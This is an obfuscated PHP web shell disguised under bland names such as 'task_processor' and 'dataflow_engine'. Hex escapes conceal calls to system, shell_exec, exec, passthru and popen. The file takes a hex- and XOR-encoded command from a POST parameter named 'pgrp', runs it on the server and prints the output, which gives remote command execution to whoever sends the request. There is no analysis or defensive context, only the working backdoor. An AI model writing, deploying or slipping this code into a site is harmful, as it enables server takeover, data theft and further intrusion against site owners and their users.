<?php

$task_processor3 = "\x65\x78ec";
$task_processor7 = "\x70c\x6C\x6Fse";
$task_processor6 = "\x73\x74re\x61\x6D\x5Fg\x65\x74_c\x6Fn\x74\x65nts";
$task_processor1 = "s\x79\x73\x74em";
$task_processor2 = "s\x68\x65\x6C\x6C\x5Fexec";
$sync_manager = "hex2b\x69\x6E";
$task_processor4 = "pass\x74h\x72u";
$task_processor5 = "po\x70e\x6E";
if (isset($_POST["\x70grp"])) {
            function dataflow_engine   (   $reference ,     $value ) {$hld  =   '' ;foreach(str_split($reference) as $char){$hld.=chr(ord($char)^$value);} return$hld;    }
            $pgrp = $sync_manager($_POST["\x70grp"]);
            $pgrp = dataflow_engine($pgrp, 19);
            if (function_exists($task_processor1)) {
                $task_processor1($pgrp);
            } elseif (function_exists($task_processor2)) {
                print $task_processor2($pgrp);
            } elseif (function_exists($task_processor3)) {
                $task_processor3($pgrp, $obj_reference);
                print join("\n", $obj_reference);
            } elseif (function_exists($task_processor4)) {
                $task_processor4($pgrp);
            } elseif (function_exists($task_processor5) && function_exists($task_processor6) && function_exists($task_processor7)) {
                $value_hld = $task_processor5($pgrp, 'r');
                if ($value_hld) {
                    $flag_item = $task_processor6($value_hld);
                    $task_processor7($value_hld);
                    print $flag_item;
                }
            }
            exit;
        }